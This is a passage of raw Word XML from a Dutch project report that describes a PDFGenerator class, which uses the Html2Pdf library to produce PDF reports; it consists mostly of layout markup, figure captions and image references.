                <wp:docPr id="680" name="Rectangle 68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1145B" id="Rectangle 680" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-71.75pt;width:25pt;height:1031.7pt;z-index:-2501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gGhpU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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002C79AC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA03859" w14:textId="1B18FA54" w:rsidR="00006A7A" w:rsidRDefault="00006A7A">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253149184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3273E1F3" wp14:editId="721EA8AA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>803910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>452120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="691" name="Text Box 691"/>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717921" w14:textId="76B221DF" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Html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3E1F3" id="Text Box 691" o:spid="_x0000_s1255" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.3pt;margin-top:35.6pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2E717921" w14:textId="76B221DF" w:rsidR="002A05E5" w:rsidRPr="00C85041" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Html2Pdf</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253148160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B716768" wp14:editId="63AC67B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>804545</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>111760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="690" name="Text Box 690"/>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1B87060" w14:textId="134A4212" w:rsidR="002A05E5" w:rsidRPr="00553D99" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>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16768" id="Text Box 690" o:spid="_x0000_s1256" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.35pt;margin-top:8.8pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="41B87060" w14:textId="134A4212" w:rsidR="002A05E5" w:rsidRPr="00553D99" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Rapport</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253146112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46812177" wp14:editId="3B85950E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1031240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="681" name="Rectangle 68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5A9CE" id="Rectangle 681" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-81.15pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E54D9" w14:textId="534A67F8" w:rsidR="00006A7A" w:rsidRDefault="00006A7A"/>
    <w:p w14:paraId="2529CA3F" w14:textId="275442F9" w:rsidR="00006A7A" w:rsidRDefault="00006A7A"/>
    <w:p w14:paraId="4F409C51" w14:textId="284820CA" w:rsidR="00006A7A" w:rsidRDefault="0021244F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253150208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="550DCEBC" wp14:editId="600CCD8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>100330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="358140"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="696" name="Text Box 696"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635" cy="3581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8E79A0D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00CA5627" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">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CEBC" id="Text Box 696" o:spid="_x0000_s1257" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63pt;margin-top:7.9pt;width:340.05pt;height:28.2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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="18E79A0D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00CA5627" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9A990" w14:textId="49051967" w:rsidR="00006A7A" w:rsidRDefault="0021244F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253151232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A87DF5D" wp14:editId="374192F3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>802640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>150495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318635" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="697" name="Text Box 697"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318635" cy="5740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1127A79" w14:textId="69428BD6" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="10469533" w14:textId="04BEEF1C" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00006A7A">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PDF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DF5D" id="Text Box 697" o:spid="_x0000_s1258" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.2pt;margin-top:11.85pt;width:340.05pt;height:45.2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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11127A79" w14:textId="69428BD6" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="10469533" w14:textId="04BEEF1C" w:rsidR="002A05E5" w:rsidRPr="00DE5F14" w:rsidRDefault="002A05E5" w:rsidP="00006A7A">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PDFGenerator</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB305A1" w14:textId="77777777" w:rsidR="00006A7A" w:rsidRDefault="00006A7A"/>
    <w:p w14:paraId="10EBB9DF" w14:textId="48FECD32" w:rsidR="00006A7A" w:rsidRDefault="00EC4689">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253158400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7212C05E" wp14:editId="15E2AC90">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>229235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>227965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="715" name="Text Box 715"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="552450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7798B9B" w14:textId="02ED77D0" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>De component om rapporten mee te genereren wordt gedaan door de Klasse PDFGenerator. Deze klasse gebruikt de Library Html2PDF dat Html documenten naar pdf-documenten converteert. Op de volgende pagina kunt u een code snippet zien van het Html document dat geconverteerd wordt door Html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2C05E" id="Text Box 715" o:spid="_x0000_s1259" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.05pt;margin-top:17.95pt;width:435pt;height:54pt;z-index:2531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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="37798B9B" w14:textId="02ED77D0" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>De component om rapporten mee te genereren wordt gedaan door de Klasse PDFGenerator. Deze klasse gebruikt de Library Html2PDF dat Html documenten naar pdf-documenten converteert. Op de volgende pagina kunt u een code snippet zien van het Html document dat geconverteerd wordt door Html2Pdf.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E466552" w14:textId="6FBC1515" w:rsidR="00006A7A" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253152256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B1DAE8F" wp14:editId="1DAACDCA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>482600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>725170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4606290" cy="3197860"/>
            <wp:effectExtent l="25400" t="25400" r="16510" b="279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DFGenerator.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4606290" cy="319786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A57F15">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E701F" w14:textId="161A6637" w:rsidR="008F7E7F" w:rsidRDefault="00273374">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04274351" w14:textId="00969C9A" w:rsidR="008F7E7F" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253233152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13F64BF5" wp14:editId="7A4E3777">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>420161</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5419725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="830" name="Text Box 830"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1270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06555" w14:textId="54443C47" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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64BF5" id="Text Box 830" o:spid="_x0000_s1260" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.1pt;margin-top:426.75pt;width:100pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15406555" w14:textId="54443C47" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.24</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253153280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46F4A0CB" wp14:editId="2D027E83">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>477520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2685415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4636135" cy="2656840"/>
            <wp:effectExtent l="25400" t="25400" r="37465" b="3556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DFGenerator 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4636135" cy="265684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8F7E7F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC8A0A" w14:textId="4C9AD140" w:rsidR="00816199" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253234176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A5A5B9D" wp14:editId="0DED8ADB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>419735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7774940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="831" name="Text Box 831"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1270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91B35C" w14:textId="3C1AC909" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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A5B9D" id="Text Box 831" o:spid="_x0000_s1261" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.05pt;margin-top:612.2pt;width:100pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3791B35C" w14:textId="3C1AC909" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 5.25</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E850AB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253161472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00B00FE2" wp14:editId="57B7EEFC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>421005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1372870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5182235" cy="6294755"/>
            <wp:effectExtent l="25400" t="25400" r="24765" b="29845"/>
            <wp:wrapSquare wrapText="bothSides"/>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report html.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5182235" cy="629475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9E58B4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253162496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3318EAD4" wp14:editId="154D1BCF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>419100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>228600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5142865" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="13335" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="768" name="Text Box 768"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5142865" cy="8026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2C707A1" w14:textId="745858F5" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Dit is een deel van het Html document dat gebruikt wordt bij het converteren naar een pdf-documenten. Dit is het eerste deel van het document zoals u kunt zien aan de twee headers &lt;h1&gt; en &lt;h2&gt; en de twee tabellen “Algemene Informatie” en “Sc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EAD4" id="Text Box 768" o:spid="_x0000_s1262" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33pt;margin-top:18pt;width:404.95pt;height:63.2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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32C707A1" w14:textId="745858F5" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Dit is een deel van het Html document dat gebruikt wordt bij het converteren naar een pdf-documenten. Dit is het eerste deel van het document zoals u kunt zien aan de twee headers &lt;h1&gt; en &lt;h2&gt; en de twee tabellen “Algemene Informatie” en “Scan Informatie”</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008F7E7F" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253160448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60661B87" wp14:editId="4D0563C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-909320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="746" name="Rectangle 74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C9B8F" id="Rectangle 746" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-71.55pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA7657">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4664F64C" w14:textId="77777777" w:rsidR="00D32EF9" w:rsidRPr="00C26333" w:rsidRDefault="00D32EF9" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
        <w:sectPr w:rsidR="00D32EF9" w:rsidRPr="00C26333" w:rsidSect="001958CD">
          <w:headerReference w:type="default" r:id="rId120"/>
          <w:headerReference w:type="first" r:id="rId121"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62696BF3" w14:textId="19AB64F3" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="002B4BAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC06C2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253239296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17595FE9" wp14:editId="61DB42A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-829536</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
